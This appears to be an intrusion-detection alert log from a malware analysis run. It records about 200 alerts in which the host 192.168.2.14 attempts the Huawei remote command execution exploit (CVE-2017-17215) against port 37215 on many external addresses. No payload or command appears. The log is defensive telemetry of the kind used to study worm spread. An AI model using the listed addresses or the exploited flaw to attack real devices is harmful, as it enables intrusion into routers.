                                            06/14/24-10:43:54.202512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111237215192.168.2.14156.217.40.73
                                            06/14/24-10:44:27.001612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933637215192.168.2.14197.37.101.102
                                            06/14/24-10:44:12.641793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655237215192.168.2.14197.233.26.232
                                            06/14/24-10:44:26.979429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364837215192.168.2.14197.118.237.236
                                            06/14/24-10:43:41.905964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732837215192.168.2.14156.22.114.46
                                            06/14/24-10:44:02.367886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817037215192.168.2.14197.144.135.216
                                            06/14/24-10:43:37.761900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454437215192.168.2.1441.9.23.80
                                            06/14/24-10:43:45.985178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747437215192.168.2.14156.61.68.188
                                            06/14/24-10:44:35.177969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200237215192.168.2.1441.163.91.244
                                            06/14/24-10:43:34.675706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701237215192.168.2.1441.148.2.72
                                            06/14/24-10:44:26.997232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614437215192.168.2.14156.247.189.194
                                            06/14/24-10:44:18.778292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048637215192.168.2.14156.145.41.195
                                            06/14/24-10:44:10.566502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630637215192.168.2.14156.142.207.66
                                            06/14/24-10:44:18.777029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149237215192.168.2.14197.43.131.221
                                            06/14/24-10:44:00.323125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979037215192.168.2.14156.163.26.80
                                            06/14/24-10:44:31.050829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474837215192.168.2.14156.94.1.105
                                            06/14/24-10:44:08.520609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265237215192.168.2.1441.120.99.191
                                            06/14/24-10:43:50.114919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754637215192.168.2.14197.20.226.34
                                            06/14/24-10:43:36.726522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741037215192.168.2.14156.48.255.140
                                            06/14/24-10:44:24.942448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279237215192.168.2.1441.80.191.97
                                            06/14/24-10:43:54.185718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373437215192.168.2.1441.76.81.182
                                            06/14/24-10:44:24.947092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813637215192.168.2.14197.72.144.29
                                            06/14/24-10:43:34.663182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3502637215192.168.2.14197.2.201.17
                                            06/14/24-10:44:12.615130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756437215192.168.2.14156.45.132.159
                                            06/14/24-10:44:31.051967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.14156.219.93.209
                                            06/14/24-10:43:52.149079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059837215192.168.2.14197.37.57.230
                                            06/14/24-10:44:04.409069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146037215192.168.2.14156.107.44.222
                                            06/14/24-10:43:52.163190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953837215192.168.2.14197.22.115.98
                                            06/14/24-10:43:39.789360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329637215192.168.2.14156.238.99.22
                                            06/14/24-10:43:39.792089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229237215192.168.2.14197.190.62.144
                                            06/14/24-10:43:34.662414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452237215192.168.2.14156.231.88.25
                                            06/14/24-10:43:48.017256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626637215192.168.2.14197.184.114.116
                                            06/14/24-10:44:31.052201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894637215192.168.2.14156.227.132.66
                                            06/14/24-10:44:12.644886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459837215192.168.2.14197.50.203.251
                                            06/14/24-10:43:56.231072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441437215192.168.2.14156.139.214.197
                                            06/14/24-10:44:02.382631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628437215192.168.2.14197.175.133.118
                                            06/14/24-10:44:35.178863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361837215192.168.2.14156.159.131.178
                                            06/14/24-10:44:14.682137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327237215192.168.2.14156.19.73.181
                                            06/14/24-10:43:45.990962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795437215192.168.2.14197.27.116.207
                                            06/14/24-10:43:58.290211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4008037215192.168.2.14197.61.123.216
                                            06/14/24-10:43:45.984540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664637215192.168.2.14156.32.151.135
                                            06/14/24-10:44:31.051231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785637215192.168.2.14197.122.67.150
                                            06/14/24-10:44:16.718834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131037215192.168.2.1441.223.73.183
                                            06/14/24-10:43:34.675847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840637215192.168.2.1441.96.223.152
                                            06/14/24-10:44:20.805910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289437215192.168.2.14197.172.203.239
                                            06/14/24-10:44:26.998161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335637215192.168.2.14197.138.29.101
                                            06/14/24-10:43:45.988081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338037215192.168.2.14156.169.177.10
                                            06/14/24-10:44:16.718753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732037215192.168.2.14156.42.65.24
                                            06/14/24-10:43:37.762330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086237215192.168.2.14197.27.216.116
                                            06/14/24-10:43:54.202997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443837215192.168.2.1441.47.13.107
                                            06/14/24-10:43:58.295287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492037215192.168.2.1441.179.144.88
                                            06/14/24-10:44:14.682015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.14197.209.238.42
                                            06/14/24-10:44:26.998643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901237215192.168.2.14156.166.48.53
                                            06/14/24-10:44:20.807457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084237215192.168.2.1441.82.102.227
                                            06/14/24-10:44:26.999543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4645637215192.168.2.14197.5.16.28
                                            06/14/24-10:44:08.502183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531637215192.168.2.1441.85.232.55
                                            06/14/24-10:44:02.367271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390237215192.168.2.14156.201.185.113
                                            06/14/24-10:44:00.340349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.1441.163.236.213
                                            06/14/24-10:43:37.762253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897637215192.168.2.14197.223.90.188
                                            06/14/24-10:44:04.423570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14156.204.219.254
                                            06/14/24-10:43:45.985025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251437215192.168.2.14197.28.106.188
                                            06/14/24-10:44:26.978701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192637215192.168.2.14156.217.201.148
                                            06/14/24-10:43:45.969627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828837215192.168.2.14156.127.189.88
                                            06/14/24-10:43:48.016489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166237215192.168.2.14156.185.93.173
                                            06/14/24-10:44:14.685398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768437215192.168.2.14197.61.215.63
                                            06/14/24-10:44:04.420870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687437215192.168.2.14197.190.176.144
                                            06/14/24-10:44:29.022650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790637215192.168.2.14197.75.171.229
                                            06/14/24-10:43:41.850794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251837215192.168.2.14197.34.251.4
                                            06/14/24-10:43:34.661259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262837215192.168.2.14156.188.227.67
                                            06/14/24-10:44:10.581790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504837215192.168.2.14197.113.68.182
                                            06/14/24-10:43:48.021140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.14156.173.208.47
                                            06/14/24-10:43:48.030673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671037215192.168.2.14197.207.240.174
                                            06/14/24-10:44:00.321356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888437215192.168.2.14197.68.215.162
                                            06/14/24-10:43:48.018274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640637215192.168.2.14156.131.205.153
                                            06/14/24-10:43:50.074276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592637215192.168.2.14197.3.96.141
                                            06/14/24-10:44:22.881520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.14197.109.196.60
                                            06/14/24-10:44:20.806576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210837215192.168.2.1441.41.69.223
                                            06/14/24-10:44:04.410768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058637215192.168.2.1441.31.56.14
                                            06/14/24-10:44:18.777954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697637215192.168.2.14156.106.162.16
                                            06/14/24-10:44:33.134870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827037215192.168.2.14156.14.82.155
                                            06/14/24-10:44:12.644139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360437215192.168.2.14156.121.60.38
                                            06/14/24-10:44:33.133324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521437215192.168.2.14156.57.245.22
                                            06/14/24-10:44:31.086829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898637215192.168.2.1441.141.5.1
                                            06/14/24-10:43:54.186230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983837215192.168.2.1441.242.69.69
                                            06/14/24-10:44:12.640696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.1441.175.71.113
                                            06/14/24-10:44:24.915949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.1441.221.165.6
                                            06/14/24-10:44:18.776945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666637215192.168.2.14156.188.243.158
                                            06/14/24-10:43:41.906954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007037215192.168.2.14197.230.201.236
                                            06/14/24-10:43:43.942793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607637215192.168.2.14197.115.91.210
                                            06/14/24-10:44:31.057763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359037215192.168.2.1441.50.108.147
                                            06/14/24-10:44:16.734765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018037215192.168.2.1441.53.249.183
                                            06/14/24-10:44:29.015232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.14197.217.128.87
                                            06/14/24-10:43:43.942119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030637215192.168.2.14156.111.110.67
                                            06/14/24-10:44:31.078299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427837215192.168.2.14197.190.46.241
                                            06/14/24-10:44:20.829488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427837215192.168.2.14156.112.147.116
                                            06/14/24-10:43:36.726113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534237215192.168.2.14197.106.147.145
                                            06/14/24-10:44:04.404973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518837215192.168.2.1441.225.210.250
                                            06/14/24-10:44:16.735190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605237215192.168.2.14197.8.62.14
                                            06/14/24-10:44:24.934993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868637215192.168.2.14156.221.93.93
                                            06/14/24-10:44:08.501438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864437215192.168.2.14156.119.11.197
                                            06/14/24-10:44:04.411579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295837215192.168.2.1441.136.184.207
                                            06/14/24-10:43:48.020292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890837215192.168.2.14197.46.19.4
                                            06/14/24-10:44:12.616045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006037215192.168.2.14197.182.107.173
                                            06/14/24-10:44:29.022613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544637215192.168.2.14197.239.40.54
                                            06/14/24-10:43:48.030478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227437215192.168.2.14156.194.182.59
                                            06/14/24-10:44:29.023297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434237215192.168.2.14156.57.29.122
                                            06/14/24-10:44:00.339678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299037215192.168.2.14197.138.103.237
                                            06/14/24-10:43:43.971569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367237215192.168.2.1441.244.14.14
                                            06/14/24-10:43:54.201010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.14156.15.228.73
                                            06/14/24-10:43:36.699956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825637215192.168.2.14156.251.224.110
                                            06/14/24-10:43:36.726565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187437215192.168.2.1441.137.152.216
                                            06/14/24-10:44:14.672246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577637215192.168.2.14197.96.106.217
                                            06/14/24-10:44:35.180292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326637215192.168.2.14156.117.182.124
                                            06/14/24-10:43:52.149900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822637215192.168.2.14156.118.146.81
                                            06/14/24-10:44:22.858836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654837215192.168.2.1441.129.85.187
                                            06/14/24-10:43:34.663018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499237215192.168.2.14197.147.108.144
                                            06/14/24-10:44:29.013898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544837215192.168.2.14197.156.75.75
                                            06/14/24-10:44:24.943190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741637215192.168.2.1441.153.248.7
                                            06/14/24-10:44:10.549458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258237215192.168.2.14197.234.20.217
                                            06/14/24-10:43:52.161335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599837215192.168.2.14156.5.46.138
                                            06/14/24-10:43:58.291897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503037215192.168.2.14156.222.255.68
                                            06/14/24-10:44:04.422109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042237215192.168.2.14156.165.119.195
                                            06/14/24-10:43:45.992043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064637215192.168.2.1441.92.80.173
                                            06/14/24-10:44:14.666391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213037215192.168.2.14156.24.80.12
                                            06/14/24-10:43:54.184331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469037215192.168.2.1441.92.106.87
                                            06/14/24-10:43:48.031806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054237215192.168.2.14197.125.197.164
                                            06/14/24-10:44:00.334628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441437215192.168.2.14197.100.132.245
                                            06/14/24-10:43:52.159957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618237215192.168.2.14197.117.230.15
                                            06/14/24-10:44:08.501888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674037215192.168.2.14156.157.69.237
                                            06/14/24-10:44:20.829390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445637215192.168.2.14197.174.155.216
                                            06/14/24-10:43:37.760679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820837215192.168.2.14156.184.105.154
                                            06/14/24-10:44:29.013420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377037215192.168.2.14156.17.252.141
                                            06/14/24-10:44:31.051512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.1441.149.67.225
                                            06/14/24-10:44:33.132438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290037215192.168.2.1441.28.72.187
                                            06/14/24-10:43:50.071682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448837215192.168.2.14156.71.121.210
                                            06/14/24-10:43:34.663781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908037215192.168.2.14197.35.88.66
                                            06/14/24-10:44:02.367980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608637215192.168.2.1441.186.219.46
                                            06/14/24-10:43:48.020171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500637215192.168.2.14197.80.191.196
                                            06/14/24-10:43:34.663289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252037215192.168.2.1441.169.58.138
                                            06/14/24-10:43:39.792509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542637215192.168.2.14156.86.219.186
                                            06/14/24-10:43:41.847013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644037215192.168.2.1441.57.51.43
                                            06/14/24-10:43:48.027700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036237215192.168.2.1441.24.54.173
                                            06/14/24-10:44:22.881472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112837215192.168.2.14156.110.180.28
                                            06/14/24-10:43:39.808814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904837215192.168.2.14197.134.170.190
                                            06/14/24-10:43:45.991009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715637215192.168.2.14197.96.82.85
                                            06/14/24-10:44:08.504812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277837215192.168.2.14197.34.29.176
                                            06/14/24-10:44:24.917528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135637215192.168.2.14156.8.253.78
                                            06/14/24-10:44:24.944087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152437215192.168.2.14156.56.57.5
                                            06/14/24-10:43:43.943438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582837215192.168.2.14156.13.150.88
                                            06/14/24-10:44:06.470436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412637215192.168.2.14156.154.145.96
                                            06/14/24-10:44:00.324958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203637215192.168.2.1441.44.72.185
                                            06/14/24-10:44:29.022714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488637215192.168.2.14156.184.43.122
                                            06/14/24-10:44:12.640901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004837215192.168.2.1441.222.7.46
                                            06/14/24-10:43:54.185960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14156.152.82.26
                                            06/14/24-10:43:58.289770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285237215192.168.2.14156.15.175.238
                                            06/14/24-10:43:56.227499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.1441.179.201.187
                                            06/14/24-10:44:22.858976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.14197.25.38.26
                                            06/14/24-10:44:31.082527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399837215192.168.2.14156.24.81.86
                                            06/14/24-10:43:34.661574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810437215192.168.2.1441.198.161.145
                                            06/14/24-10:44:33.148369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460637215192.168.2.14156.127.157.222
                                            06/14/24-10:43:58.275558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524437215192.168.2.1441.27.137.195
                                            06/14/24-10:43:58.275775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147437215192.168.2.1441.244.209.201
                                            06/14/24-10:44:08.504328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912037215192.168.2.14197.126.1.195
                                            06/14/24-10:44:06.471118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128437215192.168.2.1441.231.230.175
                                            06/14/24-10:44:26.980869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824037215192.168.2.1441.50.101.217
                                            06/14/24-10:44:00.321121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895837215192.168.2.14197.73.37.208
                                            06/14/24-10:44:35.179336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885437215192.168.2.1441.24.10.21
                                            06/14/24-10:43:56.224520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121037215192.168.2.14156.224.75.198
                                            06/14/24-10:44:02.384245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454037215192.168.2.14197.207.131.27
                                            06/14/24-10:44:14.672514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468837215192.168.2.1441.214.217.167
                                            06/14/24-10:44:33.151460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924837215192.168.2.14197.203.224.207
                                            06/14/24-10:43:48.015750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060637215192.168.2.14156.188.95.136
                                            06/14/24-10:43:39.813243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.14156.61.37.74
                                            06/14/24-10:43:43.940757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229437215192.168.2.14197.229.218.53
                                            06/14/24-10:43:58.273936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605637215192.168.2.14156.24.40.117
                                            06/14/24-10:44:22.860213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566037215192.168.2.1441.39.110.232
                                            06/14/24-10:43:48.028004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.14197.133.149.53
                                            06/14/24-10:43:58.274402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537037215192.168.2.1441.16.198.179
                                            06/14/24-10:43:54.199024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652237215192.168.2.1441.146.18.165
                                            06/14/24-10:44:24.914652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488837215192.168.2.14197.18.64.198
                                            06/14/24-10:44:35.180449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674437215192.168.2.1441.13.146.7
                                            06/14/24-10:43:58.292418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.1441.198.148.230
                                            06/14/24-10:43:54.184216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633637215192.168.2.1441.200.138.245
                                            06/14/24-10:43:39.790265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850637215192.168.2.1441.154.152.237
                                            06/14/24-10:43:45.984714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567237215192.168.2.14156.143.11.201
                                            06/14/24-10:44:18.764040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219837215192.168.2.14156.45.143.180
                                            06/14/24-10:44:10.563586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846437215192.168.2.14156.213.233.168
                                            06/14/24-10:44:00.326413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827237215192.168.2.14156.19.77.42
                                            06/14/24-10:43:45.989766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783237215192.168.2.1441.3.123.162
